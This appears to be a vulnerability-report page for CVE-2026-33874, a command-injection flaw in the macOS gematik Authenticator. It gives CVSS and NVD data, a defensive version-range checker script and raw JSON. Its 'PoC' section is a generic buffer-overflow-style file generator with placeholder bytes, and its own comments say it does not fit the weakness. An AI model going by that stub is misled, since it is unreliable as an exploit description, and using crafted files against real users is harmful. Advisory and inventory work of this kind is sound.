Security Vulnerability Report
CVE-2026-33874 CVSS 7.8 HIGH

Published: 2026-03-27 21:17:24
Last Modified: 2026-04-21 19:16:17

Description

Gematik Authenticator securely authenticates users for login to digital health applications. Starting in version 4.12.0 and prior to version 4.16.0, the macOS version of the Authenticator is vulnerable to code execution triggered when a victim opens a malicious file. Although the advisory text calls this remote code execution, the CVSS vector rates the attack vector as Local (AV:L) with user interaction required (UI:R): the attacker must deliver the file and the victim must open it, after which the attacker's code runs in the context of the Authenticator process. Update the gematik Authenticator to version 4.16.0 or greater to receive a patch. There are no known workarounds.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Weakness (NVD)
CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Configurations (Affected Products)

cpe:2.3:a:gematik:authenticator:*:*:*:*:*:*:*:* - VULNERABLE (versionStartIncluding 4.12.0, versionEndExcluding 4.16.0)
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - platform node, NOT VULNERABLE itself (AND-ed with the product node: only the macOS build is affected)
Gematik Authenticator >= 4.12.0 and < 4.16.0 on macOS; 4.16.0 is the fixed release
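Because NVD expresses the range as versionStartIncluding 4.12.0 / versionEndExcluding 4.16.0 (an inclusive lower bound and an exclusive upper bound), an inventory check has to evaluate those bounds exactly rather than a loose from-to label. The script below is an added example (not code from gematik or NVD) that does so and, on a Mac, reads the installed version from the app bundle's Info.plist. The bundle path /Applications/gematik Authenticator.app is an assumption, and the embedded Info.plist is constructed for the example.

```python
"""Check whether an installed gematik Authenticator is in the affected range.

Added example, not code from gematik or NVD: evaluates the NVD configuration
for CVE-2026-33874 (product node with versionStartIncluding 4.12.0 and
versionEndExcluding 4.16.0, AND-ed with a macOS platform node) against a
version string. The Info.plist sample is constructed for this example, and
the bundle path used for a live check is an assumption about where the app
is installed.
"""
import platform
import plistlib
import re
from pathlib import Path
from typing import Tuple

# Product match node as recorded by NVD for CVE-2026-33874.
AFFECTED_NODE = {
    "criteria": "cpe:2.3:a:gematik:authenticator:*:*:*:*:*:*:*:*",
    "versionStartIncluding": "4.12.0",
    "versionEndExcluding": "4.16.0",
}
# Platform node: the configuration is AND-ed with "running on macOS".
AFFECTED_PLATFORMS = {"macos", "darwin"}

# Assumed install location of the macOS bundle (not taken from the advisory).
ASSUMED_INFO_PLIST = Path("/Applications/gematik Authenticator.app/Contents/Info.plist")

# Constructed Info.plist for offline use; a real bundle carries many more keys.
SAMPLE_INFO_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>CFBundleName</key><string>gematik Authenticator</string>
    <key>CFBundleShortVersionString</key><string>4.15.2</string>
</dict>
</plist>
"""


def parse_version(v: str, width: int = 3) -> Tuple[int, ...]:
    """'4.15.1' -> (4, 15, 1); '4.12' -> (4, 12, 0).
    Components are zero-padded so '4.12' is not sorted below '4.12.0'.
    A pre-release suffix such as '-beta.1' is dropped, so '4.16.0-beta.1'
    compares equal to 4.16.0."""
    core = v.strip().split("-", 1)[0]
    if not re.fullmatch(r"\d+(\.\d+)*", core):
        raise ValueError(f"unparseable version: {v!r}")
    parts = [int(p) for p in core.split(".")]
    parts += [0] * max(0, width - len(parts))
    return tuple(parts)


def in_range(version: str, node: dict = AFFECTED_NODE) -> bool:
    """Apply the four optional NVD bounds (versionStart/End Including/Excluding)."""
    v = parse_version(version)
    lo_inc = node.get("versionStartIncluding")
    lo_exc = node.get("versionStartExcluding")
    hi_inc = node.get("versionEndIncluding")
    hi_exc = node.get("versionEndExcluding")
    if lo_inc is not None and v < parse_version(lo_inc):
        return False
    if lo_exc is not None and v <= parse_version(lo_exc):
        return False
    if hi_inc is not None and v > parse_version(hi_inc):
        return False
    if hi_exc is not None and v >= parse_version(hi_exc):
        return False
    return True


def is_affected(version: str, os_name: str) -> bool:
    """True only for the macOS build inside [4.12.0, 4.16.0)."""
    return os_name.lower() in AFFECTED_PLATFORMS and in_range(version)


def bundle_version(info_plist: bytes) -> str:
    """Extract CFBundleShortVersionString from an Info.plist (XML or binary)."""
    return plistlib.loads(info_plist)["CFBundleShortVersionString"]


if __name__ == "__main__":
    if ASSUMED_INFO_PLIST.exists():
        data = ASSUMED_INFO_PLIST.read_bytes()
        os_name = platform.system()  # 'Darwin' on macOS
        source = str(ASSUMED_INFO_PLIST)
    else:
        data, os_name, source = SAMPLE_INFO_PLIST, "Darwin", "constructed sample"
    ver = bundle_version(data)
    verdict = "AFFECTED, update to 4.16.0 or later" if is_affected(ver, os_name) else "not affected"
    print(f"{source}: version {ver} on {os_name}: {verdict}")
```

The check deliberately treats the platform node as a hard condition: a Windows or Linux install at 4.15.x is reported as not affected, matching the AND-ed configuration and the advisory's statement that only the macOS build is vulnerable.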

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept (PoC) for CVE-2026-33874
# This script generates a malicious file structure.
# Usage: run this script to generate 'exploit_file.bin', then open it with the
# vulnerable Gematik Authenticator.
#
# Note: this is a generic file-format template (magic header, padding, payload
# bytes). NVD classifies the weakness as CWE-78 (OS command injection), so a
# buffer-overflow style padding/overwrite layout is not what that classification
# implies; the real trigger depends on reverse engineering the file handling
# and is not given here.


def generate_malicious_file(filename):
    """
    Generates a file with a specific pattern that triggers the vulnerability.
    The actual payload structure depends on reverse engineering of the file format.
    """
    # Generic malicious header (example): the bytes spell "GEMA"
    magic_header = b"\x47\x45\x4d\x41"
    # Padding or specific pattern to reach the vulnerable buffer
    # Adjust length based on the actual offset discovered
    junk_buffer = b"A" * 500
    # Simulated overwrite address or payload
    # In a real scenario, this would be a ROP chain or shellcode
    payload = b"\x41\x42\x43\x44"
    with open(filename, "wb") as f:
        f.write(magic_header)
        f.write(junk_buffer)
        f.write(payload)
    print(f"[*] Malicious file '{filename}' created successfully.")
    print("[*] Open this file with Gematik Authenticator < 4.16.0 on macOS to trigger the vulnerability.")


if __name__ == "__main__":
    generate_malicious_file("exploit_file.bin")

References

https://github.com/gematik/app-Authenticator/security/advisories/GHSA-mjgm-7hwc-qqcr (Vendor Advisory)
https://www.machinespirits.de/advisory/2e655e/

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33874", "sourceIdentifier": "[email protected]", "published": "2026-03-27T21:17:24.213", "lastModified": "2026-04-21T19:16:17.153", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Gematik Authenticator securely authenticates users for login to digital health applications. Starting in version 4.12.0 and prior to version 4.16.0, the Mac OS version of the Authenticator is vulnerable to remote code execution, triggered when victims open a malicious file. Update the gematik Authenticator to version 4.16.0 or greater to receive a patch. There are no known workarounds."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gematik:authenticator:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.12.0", "versionEndExcluding": "4.16.0", "matchCriteriaId": "8CABC71B-E563-463E-8D56-8FB5E430C88B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}]}]}], "references": [{"url": "https://github.com/gematik/app-Authenticator/security/advisories/GHSA-mjgm-7hwc-qqcr", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.machinespirits.de/advisory/2e655e/", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}